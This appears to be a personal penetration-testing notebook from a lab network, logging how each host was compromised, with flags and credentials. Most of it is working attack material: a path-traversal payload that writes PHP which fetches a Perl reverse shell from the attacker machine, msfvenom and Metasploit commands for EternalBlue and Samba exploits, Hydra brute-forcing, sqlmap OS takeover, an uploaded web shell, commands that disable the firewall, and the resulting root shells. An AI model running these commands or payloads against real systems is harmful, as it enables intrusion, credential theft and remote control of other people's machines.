---------------------------------
-- RANDOM PWNED BOXES && NOTES --
---------------------------------

10.11.1.209 root aa123456 tomcact_manager_java_reverse_Payload.
10.11.1.116 root proof.txt f96fa30b9bc142e9d5c3649b055c28de
	Notes:
	modified sqlite DB with 2 DB's with by upload / writing perl-reverse-shell.pl ( r_shell.pl )
		-- call 1: remote.php | call 2: r_remote.php 
		-- http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../../../../../usr/local/databases/remote.php
		-- wrote file --
			-- http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../../../../../var/tmp/r_shell.pl
		-- exec fs script --	
		-- http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../../../../../usr/local/databases/r_remote.php
	default pw: admin
	data --
	<?php $x = "fetch -R -v -o /var/tmp/r_shell.pl http://10.11.0.203:81/r_shell.pl"; shell_exec($x);?>
	<?php $x = "perl /var/tmp/r_shell.pl"; echo shell_exec($x);?>	

		-- nc -lvp 4444 -vvv
		listening on [any] 4444 ...
		10.11.1.116: inverse host lookup failed: Unknown host
		connect to [10.11.0.203] from (UNKNOWN) [10.11.1.116] 63544
 		1:36AM  up  5:07, 0 users, load averages: 0.00, 0.00, 0.00
		USER       TTY      FROM                      LOGIN@  IDLE WHAT
		FreeBSD dotty 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
		uid=0(root) gid=0(wheel) groups=0(wheel)
		/
		sh: can't access tty; job control turned off
		# id
		uid=0(root) gid=0(wheel) groups=0(wheel)
		# cat /root/proof.txt
		f96fa30b9bc142e9d5c3649b055c28de
		# 

10.11.1.217 admin / admin 
access key -- hHMLfH3Bmp85qYFD
https://10.11.1.217/vtigercrm/webservice.php?operation=getchallenge&username=admin
{"success":true,"result":{"token":"5a978c840e942","serverTime":1519881348,"expireTime":1519881648}}
root@7242-alpha-reticuli:/home/cdowns# echo '5a978ed911f14hHMLfH3Bmp85qYF' | md5sum
131cf35add05d3f028aec6cfb88b15da  -
root@7242-alpha-reticuli:/home/cdowns# 

10.11.1.220 -- Done
AutoBlue MS17-10 Exploit
	c:\Windows\System32>whoami
	whoami
	nt authority\system

	c:\Windows\System32>type c:\Users\Administrator\Desktop\proof.txt
	type c:\Users\Administrator\Desktop\proof.txt
	e3622ae818a19d0648d60092afa46822

	c:\Windows\System32>



10.11.1.227 --
msfvenom -p windows/meterpreter/reverse_tcp --format asp LHOST=10.11.0.203 -o shell.asp
msfconsole -x "use exploit/multi/handler; set LHOST 10.11.0.203; set LPORT 4444; set PAYLOAD windows/meterpreter/reverse_tcp; run"
	-- Need to move shell.asp to wwwroot
	-- /home/cdowns/Security/./vnc-authentication-bypass.py 10.11.1.227 5900 ( success )
	-- python /usr/share/exploitdb/exploits/windows/remote/36932.py ( sucess )
		-- Sits at Administrator Login !

use exploit/windows/smb/eternalblue_doublepulsar
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.66
set LHOST 192.168.1.70
exploit
MACHINE VANISHED !

10.11.1.115 --
[+] 10.11.1.115:21        - 10.11.1.115:21 - Login Successful: ftp:Spring2017
[+] 10.11.1.115:22 	  - SSH - User 'abbas' found
CVE-2003-0201,Samba ‘call_trans2open’  Remote Buffer Overflow vulnerability.
msfconsole -x "use linux/samba/trans2open; set rhost 10.11.1.115; set payload generic/shell_reverse_tcp; set lhost 10.1.0.203; set lport 4444; exploit -j"
id
uid=0(root) gid=0(root) groups=99(nobody)
cat /root/proof.txt
377bbe9add593ba528fd9bd3104d2f25

10.11.1.125 --
root@7242-alpha-reticuli:~# ncftp -u anonymous 10.11.1.125
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.11.1.125...                                                                                                                                                                   
Femitter FTP Server ready.
Logging in...                                                                                                                                                                                  
User anonymous logged in.
'HELP': command not understood.                                                                                                                                                                
Logged in to 10.11.1.125.                                                                                                                                                                      
ncftp ... Files/Femitter/Shared > ls -l ../../../WINDOWS/system32/config/


10.11.1.73 --
Ovidentia 7.9.4
Not working  --
hydra -l Administrator -e ns -F -u -t 5 -w 15 -v -V -P /home/cdowns/Security/Seclists/Passwords/CommonCreds/common-passwords-win.txt 10.11.1.73 -s 8080 http-post-form "/PHP/index.php:nickname=&USER^&password=^PASS^:err=User+not+found+or+bad+password:Cookie: OV3176019645=9kt5snhv971ch35sui9hshq6h6; OV2964716481=ninp2l1l9ufri0u66hovok1o37"

Logged in --
nickname = admin@admin.bab
password = 012345678

Fucking Finally !
https://downloads.securityfocus.com/vulnerabilities/exploits/61936.txt
http://10.11.1.73:8080/PHP/index.php?tg=admoc&idx=octypes&action=delete_type&item=%27&entitytype=2
./sqlmap -r /tmp/10.11.1.73.sql -p item --dbms mysql -D ovidentia --not-string='babDatabase.db_print_error' --level 5 --risk 3 --os-pwn --msf-path /usr/share/metasploit-framework --tmp-path="c:/windows/temp/" --tamper=space2comment

./sqlmap -r /tmp/10.11.1.73.sql -p item --dbms mysql -D ovidentia --not-string='babDatabase.db_print_error' --level 5 --risk 3 --msf-path /usr/share/metasploit-framework --tmp-path='c://windows//temp//' --tamper=space2comment --no-cast --os-cmd=id

10.11.1.73:8080/tmpbeyni.php

Create Directory Upload in file manager. Adjust permissions to upload --
Upload simple shell php ( r_shell.php ) --
http://10.11.1.73:8080/php/fileManager/collectives/DG0/Upload/r_shell.php
Upload exe --
root@7242-alpha-reticuli:/tmp#msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.203 LPORT=1337 -f exe -o r_shell.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: r_shell.exe
root@7242-alpha-reticuli:/tmp# ls -l r_shell.exe 
-rw-r--r-- 1 root root 73802 Mar  9 15:11 r_shell.exe
root@7242-alpha-reticuli:/tmp# 

Exec command for reverse shell --
10.11.1.73:8080/php/fileManager/collectives/DG0/Upload/s_shell.php?cmd=r_shell.exe

Reverse Shell --
root@7242-alpha-reticuli:~# nc -lvp 1337
listening on [any] 1337 ...
10.11.1.73: inverse host lookup failed: Unknown host
connect to [10.11.0.203] from (UNKNOWN) [10.11.1.73] 52490
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\www\PHP\fileManager\collectives\DG0\Upload>whoami 
whoami
gamma\jill

C:\wamp\www\PHP\fileManager\collectives\DG0\Upload\
C:\Users\jill>cd %HOMEPATH%\Documents\
cd %HOMEPATH%\Documents\

C:\Users\jill\Documents>net user
net user

User accounts for \\GAMMA

-------------------------------------------------------------------------------
admin                    Administrator            Guest                    
jill                     
The command completed successfully.


C:\Users\jill\Documents>

Need to check access --
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
Download  --
https://download.sysinternals.com/files/AccessChk.zip

Upload to Ovidentia/Uploads/ --
root@7242-alpha-reticuli:/home/cdowns/Downloads# unzip AccessChk.zip 
Archive:  AccessChk.zip
  inflating: accesschk.exe           
  inflating: accesschk64.exe         
  inflating: Eula.txt                
root@7242-alpha-reticuli:/home/cdowns/Downloads# 

c:\wamp\www\PHP\fileManager\collectives\DG0\Upload>move accesschk.exe %HOMEPATH%\Documents\
move accesschk.exe %HOMEPATH%\Documents\
        1 file(s) moved.

c:\wamp\www\PHP\fileManager\collectives\DG0\Upload>move Eula.txt %HOMEPATH%\Documents\
c:\wamp\www\PHP\fileManager\collectives\DG0\Upload>cd %HOMEPATH%\Documents\
cd %HOMEPATH%\Documents\

c:\Users\jill\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 4AA5-A4A6

 Directory of c:\Users\jill\Documents

03/09/2018  01:55 PM    <DIR>          .
03/09/2018  01:55 PM    <DIR>          ..
03/09/2018  01:47 PM           792,208 accesschk.exe
03/09/2018  01:54 PM             7,490 Eula.txt
03/09/2018  01:55 PM                 0 move
               3 File(s)        799,698 bytes
               2 Dir(s)   1,412,886,528 bytes free

c:\Users\jill\Documents>netstat -ano 

--
  Symantec Endpoint Protection Manager
  TCP    0.0.0.0:9090           0.0.0.0:0              LISTENING       3836
--

netsh firewall add portopening TCP 9009 "SEPM"
Failed !! Not Administrator.

Uploaded nc.exe for port forwarding.

c:\wamp\www\PHP\fileManager\collectives\DG0\Upload>move nc.exe %HOMEPATH%\Documents\
move nc.exe %HOMEPATH%\Documents\
        1 file(s) moved.

c:\wamp\www\PHP\fileManager\collectives\DG0\Upload>cd %HOMEPATH%\Documents\
cd %HOMEPATH%\Documents\

Diabled Firewall - Listening locally --
netsh firewall set opmode disable


Create meterepter.exe payload for portforwarding --
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=10.11.0.203 lport=1337 -b "\x00" -f exe -o mtr.exe

Listen msf --
set lport 1337
https://www.offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/

meterpreter > getuid
Server username: GAMMA\jill
meterpreter >

C:\Windows\system32>type c:\Users\admin\Desktop\proof.txt
type c:\Users\admin\Desktop\proof.txt
e18a24030ad7c23250b41c2fd257c71e 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


12:04:29-cdowns@7242-alpha-reticuli:~/Security/sqlmap-dev$ ipcalc 10.11.1.1 - 10.11.1.254
deaggregate 10.11.1.1 - 10.11.1.254
10.11.1.1/32
10.11.1.2/31
10.11.1.4/30
10.11.1.8/29
10.11.1.16/28
10.11.1.32/27
10.11.1.64/26
10.11.1.128/26
10.11.1.192/27
10.11.1.224/28
10.11.1.240/29
10.11.1.248/30
10.11.1.252/31
10.11.1.254/32
14:04:49-cdowns@7242-alpha-reticuli:~/Security/sqlmap-dev$ 

SSH With No valid $HOME --
Quick work around when trying to write $HOME/.ssh/ without enough perms --
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i id_rsa user@localhost





